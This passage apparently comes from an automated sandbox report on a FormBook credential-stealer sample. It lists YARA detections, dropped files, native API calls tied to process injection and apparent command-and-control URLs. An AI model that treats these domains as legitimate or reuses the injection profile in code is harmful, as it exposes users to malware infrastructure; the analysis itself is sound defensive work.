          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.glowtey.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.glowtey.com/tln/
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.glowtey.com/tln/www.proseo.digital
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.glowtey.comReferer:
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.goodfont.co.kr
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.heyidianzib.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.heyidianzib.com/tln/
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.heyidianzib.com/tln/www.olisolution.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.heyidianzib.comReferer:
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.jgdesignco.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.jgdesignco.com/tln/
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.jgdesignco.com/tln/www.heyidianzib.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.jgdesignco.comReferer:
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.jiyu-kobo.co.jp/
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.keytoblogging.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.keytoblogging.com/tln/
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.keytoblogging.com/tln/www.montieri.net
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.keytoblogging.comReferer:
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.kjvrvg.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.kjvrvg.com/tln/
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.kjvrvg.com/tln/www.jgdesignco.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.kjvrvg.comReferer:
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.laesses.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.laesses.com/tln/
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.laesses.com/tln/www.creditcommoncents.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.laesses.comReferer:
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.montieri.net
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.montieri.net/tln/
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.montieri.net/tln/v
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.montieri.netReferer:
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.olisolution.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.olisolution.com/tln/
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.olisolution.com/tln/www.onthejoblanguages.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.olisolution.comReferer:
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.onthejoblanguages.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.onthejoblanguages.com/tln/
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.onthejoblanguages.com/tln/www.laesses.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.onthejoblanguages.comReferer:
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.proseo.digital
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.proseo.digital/tln/
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.proseo.digital/tln/www.saliwasims.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.proseo.digitalReferer:
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sajatypeworks.com
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sakkal.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.saliwasims.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.saliwasims.com/tln/
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.saliwasims.com/tln/www.ero-special.net
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.saliwasims.comReferer:
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.sandoll.co.kr
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, explorer.exe, 00000005.00000002.484794744.0000000004EA9000.00000004.00000001.sdmpString found in binary or memory: http://www.themayoparty.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmp, explorer.exe, 00000005.00000002.484794744.0000000004EA9000.00000004.00000001.sdmpString found in binary or memory: http://www.themayoparty.com/tln/
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.themayoparty.com/tln/www.glowtey.com
          Source: explorer.exe, 00000002.00000002.494732018.0000000005917000.00000004.00000001.sdmpString found in binary or memory: http://www.themayoparty.comReferer:
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.tiro.com
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.typography.netD
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.urwpp.deDPlease
          Source: explorer.exe, 00000002.00000000.239748077.000000000B156000.00000002.00000001.sdmpString found in binary or memory: http://www.zhongyicts.com.cn
          Source: explorer.exe, 00000005.00000002.476037597.00000000001E8000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_desktop.srf&lw=1&fl=wld2Gw
          Source: explorer.exe, 00000005.00000003.355707285.0000000005940000.00000004.00000001.sdmpString found in binary or memory: https://login.live.com/oauth20_logout.srfhttps://login.live.com/oauth20_desktop.srfhttps://login.liv
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_00424C58 GetClipboardData,CopyEnhMetaFileA,GetEnhMetaFileHeader,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0043A784 GetKeyboardState,

          E-Banking Fraud:

          barindex
          Yara detected FormBookShow sources
          Source: Yara matchFile source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORY
          Source: Yara matchFile source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPE
          Source: Yara matchFile source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPE

          System Summary:

          barindex
          Detected FormBook malwareShow sources
          Source: C:\Windows\SysWOW64\explorer.exeDropped file: C:\Users\user\AppData\Roaming\55R0B44T\55Rlogri.iniJump to dropped file
          Source: C:\Windows\SysWOW64\explorer.exeDropped file: C:\Users\user\AppData\Roaming\55R0B44T\55Rlogrv.iniJump to dropped file
          Malicious sample detected (through community Yara rule)Show sources
          Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.256707467.0000000000D30000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.480556818.00000000027D0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.482583136.00000000045B0000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000005.00000002.476122908.0000000000220000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000001.213014038.0000000000400000.00000040.00020000.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.256661656.0000000000D00000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.215688359.0000000004170000.00000004.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000000.00000002.215724959.00000000041B0000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 00000001.00000002.256039719.0000000000400000.00000040.00000001.sdmp, type: MEMORYMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.R6o4qCis6s.exe.41b0000.3.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.R6o4qCis6s.exe.4170000.2.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.R6o4qCis6s.exe.41b0000.3.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.1.R6o4qCis6s.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 0.2.R6o4qCis6s.exe.4170000.2.raw.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: autogenerated rule brought to you by yara-signator Author: Felix Bilstein - yara-signator at cocacoding dot com
          Source: 1.2.R6o4qCis6s.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: detect Formbook in memory Author: JPCERT/CC Incident Response Group
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_00458784 NtdllDefWindowProc_A,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0043D6BC NtdllDefWindowProc_A,GetCapture,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_00458F00 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_00458FB0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0044D1BC GetSubMenu,SaveDC,RestoreDC,731EB080,SaveDC,RestoreDC,NtdllDefWindowProc_A,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00419CA0 NtCreateFile,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00419D50 NtReadFile,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00419DD0 NtClose,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00419E80 NtAllocateVirtualMemory,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00419C9A NtCreateFile,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A398F0 NtReadVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A399A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39A20 NtResumeThread,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39A00 NtProtectVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A395D0 NtClose,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39540 NtReadFile,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A396E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A397A0 NtUnmapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A398A0 NtWriteVirtualMemory,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39820 NtEnumerateKey,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A3B040 NtSuspendThread,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A399D0 NtCreateProcessEx,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39950 NtQueueApcThread,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39A80 NtOpenDirectoryObject,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39A10 NtQuerySection,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A3A3B0 NtGetContextThread,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39B00 NtSetValueKey,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A395F0 NtQueryInformationFile,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39520 NtWaitForSingleObject,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A3AD30 NtSetContextThread,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39560 NtWriteFile,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A396D0 NtCreateKey,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39610 NtEnumerateValueKey,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39670 NtQueryInformationProcess,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39650 NtQueryValueKey,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39FE0 NtCreateMutant,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39730 NtQueryVirtualMemory,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A3A710 NtOpenProcessToken,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39760 NtOpenProcess,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A39770 NtSetInformationFile,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A3A770 NtOpenThread,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_1_00419CA0 NtCreateFile,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_1_00419D50 NtReadFile,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_1_00419DD0 NtClose,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869840 NtDelayExecution,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869860 NtQuerySystemInformation,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_048699A0 NtCreateSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_048695D0 NtClose,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869910 NtAdjustPrivilegesToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869540 NtReadFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869560 NtWriteFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_048696D0 NtCreateKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_048696E0 NtFreeVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869610 NtEnumerateValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869650 NtQueryValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869A50 NtCreateFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869660 NtAllocateVirtualMemory,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869780 NtMapViewOfSection,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869FE0 NtCreateMutant,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869B00 NtSetValueKey,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869710 NtQueryInformationToken,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869770 NtSetInformationFile,LdrInitializeThunk,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_048698A0 NtWriteVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_048698F0 NtReadVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869820 NtEnumerateKey,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0486B040 NtSuspendThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_048699D0 NtCreateProcessEx,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_048695F0 NtQueryInformationFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869520 NtWaitForSingleObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0486AD30 NtSetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869950 NtQueueApcThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869A80 NtOpenDirectoryObject,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869A00 NtProtectVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869A10 NtQuerySection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869A20 NtResumeThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869670 NtQueryInformationProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_048697A0 NtUnmapViewOfSection,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0486A3B0 NtGetContextThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0486A710 NtOpenProcessToken,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869730 NtQueryVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_04869760 NtOpenProcess,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0486A770 NtOpenThread,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00239CA0 NtCreateFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00239D50 NtReadFile,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00239DD0 NtClose,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00239E80 NtAllocateVirtualMemory,
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_00239C9A NtCreateFile,
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0040C340
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_00452DE0
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0044D1BC
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 0_2_0046724C
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00401026
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00401030
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_0041DA67
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_0041D4F2
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_0041E4F7
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_0041E4FA
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00402D87
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00402D90
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00409E20
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_0041CEE3
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_0041E764
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00402FB0
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A0B090
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00AB1002
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A14120
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_009FF900
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A2EBB0
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A0841F
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A0D5E0
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_009F0D20
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00AC1D55
          Source: C:\Users\user\Desktop\R6o4qCis6s.exeCode function: 1_2_00A16E30
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_0483B090
          Source: C:\Windows\SysWOW64\explorer.exeCode function: 5_2_048520A0
